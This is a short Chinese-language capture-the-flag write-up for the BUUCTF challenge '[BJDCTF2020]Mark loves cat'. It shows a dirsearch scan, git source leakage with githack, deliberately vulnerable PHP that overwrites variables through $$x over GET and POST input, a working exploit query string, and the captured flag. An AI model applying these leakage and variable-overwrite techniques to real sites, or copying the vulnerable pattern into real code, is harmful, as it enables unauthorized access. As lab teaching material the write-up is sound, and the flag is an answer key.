buuctf [BJDCTF2020]Mark loves cat 1

#buuctf [BJDCTF2020]Mark loves cat 1

1、扫描目录，发现git源码泄露：

python dirsearch.py -u http://56031302-b451-41d8-9519-cf380f17cbcb.node5.buuoj.cn:81/

2、下载源码，用githack

python githack.py http://56031302-b451-41d8-9519-cf380f17cbcb.node5.buuoj.cn:81/.git

3.下载看到index.php 的源码，还有flag.php的源码

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}



echo "the flag is: ".$flag;

flag在flag变量中；根据源码，我们只需要exit($flag)即可以得到flag

1、我们只需要让$handsome=$flag
2、$yds=$flag
3、$is=$flag

构造pyload：

?handsome=flag&flag=handsome
传入handsome=flag则：
$x=handsome $y=flag
$$x=$handsome $$y=$flag
$handsome=$flag

因为$_GET['flag'] === $x && $x !== 'flag'
所以让flag=handsome
就执行exit($handsome)

剩下两个就不举例了

http://56031302-b451-41d8-9519-cf380f17cbcb.node5.buuoj.cn:81/?handsome=flag&flag=handsome
#flag{78246fc9-23ca-422f-b2ea-f7677c6c6370}